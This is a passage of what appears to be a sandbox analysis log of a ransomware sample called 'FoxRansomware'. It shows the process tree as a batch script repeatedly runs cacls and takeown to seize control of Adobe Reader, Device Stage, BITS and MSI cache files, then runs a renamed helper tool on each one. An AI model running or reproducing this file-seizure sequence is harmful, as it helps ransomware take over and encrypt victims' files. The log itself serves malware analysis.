C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "CORPCHAR.TXT" -nobanner3⤵PID:4092
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "CORPCHAR.TXT" -nobanner4⤵PID:1660
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1244
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""2⤵PID:3772
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C3⤵PID:3716
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"3⤵PID:1808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "CP1250.TXT" -nobanner3⤵PID:2616
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "CP1250.TXT" -nobanner4⤵PID:3812
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1672
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""2⤵PID:2836
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C3⤵PID:3828
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"3⤵
- Modifies file permissions
PID:4000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "cryptocme2.sig" -nobanner3⤵PID:3796
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "cryptocme2.sig" -nobanner4⤵PID:3768
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3592
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:1616
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:3908
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵PID:3924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "background.png" -nobanner3⤵PID:1604
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "background.png" -nobanner4⤵PID:1800
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2880
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""2⤵PID:3868
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C3⤵PID:2180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"3⤵PID:4020
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "tasks.xml" -nobanner3⤵PID:2648
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "tasks.xml" -nobanner4⤵PID:4056
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:400
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat""2⤵PID:728
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C3⤵PID:1372
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat"3⤵PID:3856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "qmgr0.dat" -nobanner3⤵PID:3036
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "qmgr0.dat" -nobanner4⤵PID:844
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵PID:2376
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png" /E /G Admin:F /C3⤵PID:2420
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵PID:2388
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "overlay.png" -nobanner3⤵PID:1696
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "overlay.png" -nobanner4⤵PID:1412
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3100
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml""2⤵PID:1652
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml" /E /G Admin:F /C3⤵PID:1792
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\resource.xml"3⤵
- Modifies file permissions
PID:3116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "resource.xml" -nobanner3⤵PID:1092
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "resource.xml" -nobanner4⤵PID:3712
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""2⤵PID:2996
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C3⤵PID:3132
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"3⤵PID:2228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "adobepdf.xdc" -nobanner3⤵PID:2676
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "adobepdf.xdc" -nobanner4⤵PID:1644
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:368
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""2⤵PID:3128
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C3⤵PID:3332
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"3⤵PID:1064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "background.png" -nobanner3⤵PID:3260
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "background.png" -nobanner4⤵PID:2224
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""2⤵PID:3264
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C3⤵PID:2588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"3⤵PID:2496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "tasks.xml" -nobanner3⤵PID:3280
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "tasks.xml" -nobanner4⤵PID:2708
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3196
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat""2⤵PID:3320
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C3⤵PID:2472
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat"3⤵
- Modifies file permissions
PID:3352
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "qmgr0.dat" -nobanner3⤵PID:3064
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "qmgr0.dat" -nobanner4⤵PID:3312
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2504
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi""2⤵PID:2808
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi" /E /G Admin:F /C3⤵PID:228
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi"3⤵PID:2160
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "vc_runtimeAdditional_x64.msi" -nobanner3⤵PID:220
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "vc_runtimeAdditional_x64.msi" -nobanner4⤵PID:2860
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3160
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Package Cache\{7DAD0258-515C-3DD4-8964-BD714199E0F7}v12.0.40660\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi""2⤵PID:1668
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Package Cache\{7DAD0258-515C-3DD4-8964-BD714199E0F7}v12.0.40660\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi" /E /G Admin:F /C3⤵PID:3316
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Package Cache\{7DAD0258-515C-3DD4-8964-BD714199E0F7}v12.0.40660\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi"3⤵
- Modifies file permissions
PID:3444
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "vc_runtimeAdditional_x86.msi" -nobanner3⤵PID:1928
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "vc_runtimeAdditional_x86.msi" -nobanner4⤵PID:3060
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi""2⤵PID:3216
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi" /E /G Admin:F /C3⤵PID:476
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi"3⤵PID:2024
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "vc_runtimeMinimum_x64.msi" -nobanner3⤵PID:3496
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "vc_runtimeMinimum_x64.msi" -nobanner4⤵PID:3492
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""2⤵PID:1716
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C3⤵PID:3484
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"3⤵PID:1692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "ended_review_or_form.gif" -nobanner3⤵PID:1168
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "ended_review_or_form.gif" -nobanner4⤵PID:2724
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2692
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""2⤵PID:2132
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C3⤵PID:1096
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"3⤵PID:668
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "reviewers.gif" -nobanner3⤵PID:3480
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "reviewers.gif" -nobanner4⤵PID:3324
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""2⤵PID:520
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C3⤵PID:2104
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"3⤵PID:2564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "server_lg.gif" -nobanner3⤵PID:636
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "server_lg.gif" -nobanner4⤵PID:2760
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3176
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""2⤵PID:2952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C3⤵PID:3524
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"3⤵PID:3388
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "turnOnNotificationInTray.gif" -nobanner3⤵PID:1332
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "turnOnNotificationInTray.gif" -nobanner4⤵PID:2916
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3620
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""2⤵PID:3520
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C3⤵PID:2256
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"3⤵PID:1732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "MinionPro-Bold.otf" -nobanner3⤵PID:2240
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "MinionPro-Bold.otf" -nobanner4⤵PID:2904
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1260
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""2⤵PID:3912
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C3⤵PID:1632
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"3⤵PID:2896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "zy______.pfm" -nobanner3⤵PID:3544
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "zy______.pfm" -nobanner4⤵PID:1964
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""2⤵PID:2512
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C3⤵PID:3676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"3⤵
- Modifies file permissions
PID:4084
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "brt.fca" -nobanner3⤵PID:3848
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "brt.fca" -nobanner4⤵PID:4016
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3548
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp""2⤵PID:3980
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C3⤵PID:2476
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"3⤵PID:4044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "eng.hyp" -nobanner3⤵PID:3580
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "eng.hyp" -nobanner4⤵PID:3728
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4048
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""2⤵PID:2604
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C3⤵PID:3780
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"3⤵PID:2988
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "zdingbat.txt" -nobanner3⤵PID:3788
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "zdingbat.txt" -nobanner4⤵PID:2912
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3672
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""2⤵PID:3756
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C3⤵PID:3920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"3⤵
- Modifies file permissions
PID:3764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "TURKISH.TXT" -nobanner3⤵PID:3852
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "TURKISH.TXT" -nobanner4⤵PID:3976
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:4032
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""2⤵PID:1360
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C3⤵PID:3800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"3⤵PID:1524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "br.gif" -nobanner3⤵PID:1280
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "br.gif" -nobanner4⤵PID:3340
-
-
-
